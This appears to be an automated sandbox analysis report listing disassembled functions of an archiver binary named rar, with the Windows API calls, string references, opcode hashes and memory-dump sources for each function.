API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: a3d005d398edc2373c4d8a22e4a39977feedd0f537c9472104173cc64dc934f7
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: FC217321F1879182EA308F12A44012AA6E4FF84FD4F485375DE9EA7BD4DF3CE8568748

Function 00007FF695CF3A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,00007FF695CF11B0,?,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF3AC4
CreateFileW.KERNEL32(?,?,?,00007FF695CF11B0,?,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF3B0A
DeviceIoControl.KERNEL32 ref: 00007FF695CF3B55
CloseHandle.KERNEL32(?,?,?,00007FF695CF11B0,?,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF3B60

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CreateFile$CloseControlDeviceHandle
String ID:
API String ID: 998109204-0
Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
Instruction ID: b09a002cdf9da9aaf431ca9dd14922c82405b46b7c18984d36d1810c512612ea
Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
Instruction Fuzzy Hash: 0C318F32618B8186E7708F11B4446AAB7A4FB88BE4F011335EEA953BD4DF7CC9598B04

Function 00007FF695D1B4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF695D1B549
SetPriorityClass.KERNEL32 ref: 00007FF695D1B554
GetCurrentThread.KERNEL32 ref: 00007FF695D1B55A
SetThreadPriority.KERNEL32 ref: 00007FF695D1B565

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CurrentPriorityThread$ClassProcess
String ID:
API String ID: 1171435874-0
Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
Instruction ID: 206e28a5e18cd5db6a79009cb142b3a57b28c18e6b64d22d68213f24ba934d5d
Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
Instruction Fuzzy Hash: BE110C72A196428FF6788B11E48427C62E1EB84F44F6062B5D70A97695EF2CBC4D4748

Function 00007FF695D35630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF695D2F3FC,?,?,?,00007FF695D3143D), ref: 00007FF695D3563A
SetLastError.KERNEL32(?,?,?,00007FF695D2F3FC,?,?,?,00007FF695D3143D), ref: 00007FF695D356A2
SetLastError.KERNEL32(?,?,?,00007FF695D2F3FC,?,?,?,00007FF695D3143D), ref: 00007FF695D356B8
abort.LIBCMT ref: 00007FF695D356BE

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction ID: 95f2ea7dbfe6165507ceffb4222dabab0ba1c89b2016b8a8cb7ad529e88983d1
Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction Fuzzy Hash: 2D014C20B0960342FE78A771AA5917816D1CF48F88F1467B8DD1ECB7D6ED3DAC498648

Function 00007FF695D1B850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D1BBFC: ResetEvent.KERNEL32 ref: 00007FF695D1BC15
Part of subcall function 00007FF695D1BBFC: ReleaseSemaphore.KERNEL32 ref: 00007FF695D1BC2B

ReleaseSemaphore.KERNEL32 ref: 00007FF695D1B887
CloseHandle.KERNEL32 ref: 00007FF695D1B8A8
DeleteCriticalSection.KERNEL32 ref: 00007FF695D1B8C0
CloseHandle.KERNEL32 ref: 00007FF695D1B8CE

Part of subcall function 00007FF695D1B974: WaitForSingleObject.KERNEL32 ref: 00007FF695D1B97B
Part of subcall function 00007FF695D1B974: GetLastError.KERNEL32 ref: 00007FF695D1B986

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
Instruction ID: 440647ee96786f551c7737fc7b9c97bba31ec94a1ef144fbfdcae318c800ef94
Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
Instruction Fuzzy Hash: 5C118232614A41D7E2249F20E544669A3B0FB85FA0F001331DBAD576E5CF39E8B9C748

Function 00007FF695D358A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D35908

Strings

gfffffff, xrefs: 00007FF695D35B96

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
Instruction ID: 4fe5e91d6659b11fafb12ec2c4b18e7526eaab5381830f660aabc97d15361308
Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
Instruction Fuzzy Hash: A8912862B093C686EB358F2591803BC6BD5EB26FD4F04A271CA8D87395DE3CE919D305

Function 00007FF695D0CFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730

new.LIBCMT ref: 00007FF695D0CFD9

Strings

rev, xrefs: 00007FF695D0D00F
rar, xrefs: 00007FF695D0D074

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Sleep
String ID: rar$rev
API String ID: 3472027048-2145959568
Opcode ID: dcef9068b42a9893c7f4a7cadf32c303cffa6ff2c452e1383d41a9728c4e1a7d
Instruction ID: 795b37d4f7cbb929c278dd21fd22400a9dc2941b3a7b80c8644e471339e57cf6
Opcode Fuzzy Hash: dcef9068b42a9893c7f4a7cadf32c303cffa6ff2c452e1383d41a9728c4e1a7d
Instruction Fuzzy Hash: C6A1CF22A0968282EA30EB30C4542BD63E5FF44F84F5562B7DA5D8B6D6DF2CED48C345

Function 00007FF695D2F7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D2F7FE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D2FA3C

Strings

*, xrefs: 00007FF695D2F90C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
Instruction ID: 5fd3eba5d177987e1e19a2d189fed53c7b3bef8177a03d4c7bdce94e1c4f7fa6
Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
Instruction Fuzzy Hash: B3716072908617C6E7788F24804603C7BE0FB45F48F2427B6DA5AC2294EF39DD8AC709

Function 00007FF695D35CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D35D17

Strings

gfff, xrefs: 00007FF695D35E42
e+000, xrefs: 00007FF695D35DBF

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction ID: 389b1ca0515f5bcd5e056616024abf03a248af2fca052a703f0601e1b94e2751
Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction Fuzzy Hash: 1751F562B187C246E7358B35A9413697BD1EB41F94F08A3B1C698CBBD5CE3CD848C704

Function 00007FF695D04534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF695CF475B,?,00000000,?,?,00007FF695CF4620,?,00000000,?), ref: 00007FF695D04633

Strings

\\?\, xrefs: 00007FF695D045B6, 00007FF695D04602, 00007FF695D04684, 00007FF695D046D3
UNC, xrefs: 00007FF695D04614

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CurrentDirectory
String ID: UNC$\\?\
API String ID: 1611563598-253988292
Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
Instruction ID: 377ff047bd230e9e592eab6c602f5d3bc3254e91128c5e91eee19ff541c3eb77
Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
Instruction Fuzzy Hash: F741A001A0868280E934AB21E5015F922D1EF45FD4FC1A3B2DD5EC76D6EE6CEE8DC208

Function 00007FF695D17C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00007FF695D17471), ref: 00007FF695D17C96
wcsstr.LIBVCRUNTIME ref: 00007FF695D17CBC

Strings

System Volume Information\, xrefs: 00007FF695D17CB2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AttributesFilewcsstr
String ID: System Volume Information\
API String ID: 1592324571-4227249723
Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction ID: 87976ce91537a6b06ae008904cacf3402383abc5d812aced837017e2a82f69f7
Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction Fuzzy Hash: 4D31F622A1D68185FB75DB21A1516BE27E1EF45FC0F0462B0DE8D977A6CE3CEC4A8704

Function 00007FF695CE4888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CE48F8

Part of subcall function 00007FF695D149F4: LoadStringW.USER32 ref: 00007FF695D14A7B
Part of subcall function 00007FF695D149F4: LoadStringW.USER32 ref: 00007FF695D14A94

Part of subcall function 00007FF695CE8444: fflush.LIBCMT ref: 00007FF695CE8477

Strings

%d.%02d, xrefs: 00007FF695CE48DE
[, xrefs: 00007FF695CE48E5

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: LoadString$fflushswprintf
String ID: %d.%02d$[
API String ID: 1946543793-195111373
Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
Instruction ID: a3aae3af4b155f5821c235e0044df1694b5690cc4c625dc4facd60fdbabaee8d
Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
Instruction Fuzzy Hash: 8531AE22A195C291FA74EB10E0523B967E0EF85F84F4021B9D64E9B6C6DF3CED48C748

Function 00007FF695D0F474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D0F4D2

Strings

fixed%u., xrefs: 00007FF695D0F4C6
fixed., xrefs: 00007FF695D0F4B8

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: swprintf
String ID: fixed%u.$fixed.
API String ID: 233258989-2525383582
Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
Instruction ID: d2bd5dd947333741e1aa55be30f18e32ed628b4caadafd3d996f6a7b369fb398
Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
Instruction Fuzzy Hash: 4131A822A0868291F7309B25E4017E963E0EB84B90F901272EE8D976DADF3CD94AC744

Function 00007FF695D13C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D13CB0

Strings

@%s, xrefs: 00007FF695D13C94
$%s, xrefs: 00007FF695D13C9D

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: snprintf
String ID: $%s$@%s
API String ID: 4288800496-834177443
